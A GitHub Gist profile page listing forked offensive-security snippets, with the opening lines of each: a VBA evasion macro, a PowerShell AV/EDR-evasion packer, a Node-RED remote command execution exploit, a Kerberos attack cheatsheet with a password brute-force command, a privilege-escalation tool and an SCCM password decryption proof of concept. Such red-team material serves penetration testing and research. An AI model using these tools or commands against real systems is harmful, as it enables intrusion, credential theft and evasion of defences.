Skip to content

Instantly share code, notes, and snippets.

View neontechtra's full-sized avatar

neontechtra

1 follower · 3 following
View GitHub Profile
@neontechtra
neontechtra / PCMPBNMBAO_x86_poc.vba
Created February 1, 2024 23:17 — forked from xpn/PCMPBNMBAO_x86_poc.vba
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
@neontechtra
neontechtra / EncodeAssembly.ps1
Created April 14, 2024 02:24 — forked from Mayfly277/EncodeAssembly.ps1
This script is a modification of the one from @snovvcrash website : https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly and some code of PowerSharpPack. This is made to package some bniaries to powershell.
Function Invoke-EncodeAssembly
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true)]
[String]
$binaryPath,
[Parameter(Mandatory=$true)]
[String]
@neontechtra
neontechtra / noderedsh.py
Created May 27, 2024 12:01 — forked from qkaiser/noderedsh.py
Node RED Remote Command Execution.
#!/usr/bin/env python3
"""
----------------------------------------------------------------------------
"THE BEER-WARE LICENSE" (Revision 42):
QKaiser wrote this file. As long as you retain this notice you
can do whatever you want with this stuff. If we meet some day, and you think
this stuff is worth it, you can buy me a beer in return.
----------------------------------------------------------------------------
----------------------------------------------------------------------------
Node-RED Remote Command Execution exploit.
@neontechtra
neontechtra / kerberos_attacks_cheatsheet.md
Created June 24, 2024 00:20 — forked from xct/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@neontechtra
neontechtra / TcbElevation.cpp
Created October 11, 2024 20:15 — forked from antonioCoco/TcbElevation.cpp
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@neontechtra
neontechtra / sccmdecryptpoc.cs
Created April 27, 2025 03:22 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program